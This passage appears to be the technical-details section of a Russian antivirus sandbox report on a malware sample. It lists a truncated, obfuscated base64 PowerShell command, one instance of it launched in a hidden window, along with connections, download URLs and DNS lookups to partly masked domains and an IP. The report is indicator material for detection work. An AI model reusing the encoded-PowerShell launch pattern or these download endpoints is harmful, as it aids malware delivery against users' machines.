Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABTAGMAYABSAEkAcABUAH0AIAA9ACAALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAC0AbwBiAGoAZQBjAHQAJwAsACcAZQB3ACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADMAfQB7AD...
- '34.##9.100.209':443
- 'um##x.com':80
- 'ny##ges.net':80
- http://um##x.com/yrr/
- http://ny##ges.net/qqr/
- '34.##9.100.209':443
- DNS ASK ke###eal.com
- DNS ASK ea###am.co.uk
- DNS ASK um##x.com
- DNS ASK ny##ges.net
- DNS ASK bm###erplus.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABTAGMAYABSAEkAcABUAH0AIAA9ACAALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAC0AbwBiAGoAZQBjAHQAJwAsACcAZQB3ACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADMAfQB7AD... (со скрытым окном)